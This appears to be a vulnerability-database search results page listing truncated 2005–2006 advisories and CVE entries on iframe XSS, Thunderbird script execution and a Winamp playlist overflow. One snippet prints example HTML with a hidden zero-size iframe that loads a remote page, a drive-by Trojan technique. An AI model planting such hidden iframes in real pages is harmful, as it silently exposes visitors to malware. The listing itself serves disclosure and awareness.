5113 matches found
PHPSelect Submit-A-Link - HTML Injection
source: https://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of th...
link bank code execution and xss
——– summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high ——– description Link Bank does not sanitise post submitted to it...
Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities
source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. These issues...
DEBIAN-CVE-2006-0884
The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...
CVE-2006-0884
The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...
Mozilla Thunderbird code execution
IFRAME SRC attribute allows javascript execution...
Mozilla Thunderbird : Remote Code Execution & Denial of Service
Mozilla Thunderbird : Remote Code Execution & Denial of Service //----- Advisory Program : Mozilla Thunderbird Homepage : http://www.mozilla.com/thunderbird/ Tested version : = 1.0.7 Found by : nono2357 at sysdream dot com This advisory : nono2357 at sysdream dot com Discovery date : 2006/01/28...
CVE-2005-3630
Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives...
Mozilla (Multiple Products) - iFrame JavaScript Execution
Mozilla Multiple Products - iFrame JavaScript Execution source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing maliciou...
Mozilla (Multiple Products) - iFrame JavaScript Execution
source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing malicious script code in an IFRAME and the user tries to reply t...
Cross site scripting
Cross-site scripting (XSS) vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag...
CVE-2006-0779
Cross-site scripting (XSS) vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag...
CVE-2005-4720
Mozilla Firefox 1.0.7 and earlier on Linux allows remote attackers to cause a denial of service (client crash) via an IFRAME element with a large value of the WIDTH attribute, which triggers a problem related to representation of floating-point numbers, leading to an infinite loop of widget resizes...
Winamp 5.12 - '.pls' Remote Buffer Overflow (1)
/ Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP Pro Sp2 / / Usage: Execute exploit, it will...
Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)
No description provided by source. / Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP Pro Sp2 / ...
CVE-2006-0407
Cross-site scripting (XSS) vulnerability in post.php in AZ Bulletin Board (AZbb) 1.1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the nickname parameter and (2) an iframe tag in the topic parameter. NOTE: the original disclosure specified the name parameter, but a...
CVE-2006-0407
CVE-2006-0407 affects AZ Bulletin Board (AZbb) 1.1.00 and earlier. The vulnerability is a cross-site scripting (XSS) flaw in post.php, exploitable via the nickname parameter and an iframe tag in the topic parameter, enabling injection of arbitrary HTML/JavaScript by an attacker. The description n...
Some so-called JPG or GIF image web-page Trojans - vulnerability warning - the black bar safety net
Some so-called GIF image web Trojans: the related web page is often written like this: <html> <body> <iframe src=http://x.x.x.x/1.htm width=0 height=0></iframe> <img src=http://y.y.y.y/images/logo.gif></img> </body> </html> Save the above code as mm.htm and then put it online. Of course, if you rename this mm.htm to mm.jpg, and then use another page to...
CVE-2006-0180
CaLogic Calendars 1.2.2 contains a cross-site scripting (XSS) vulnerability that allows remote attackers to inject arbitrary script/HTML via the Title field on the "Adding New Event" page, and possibly other vectors involving iframe tags. The affected component is the calendar input handling in C...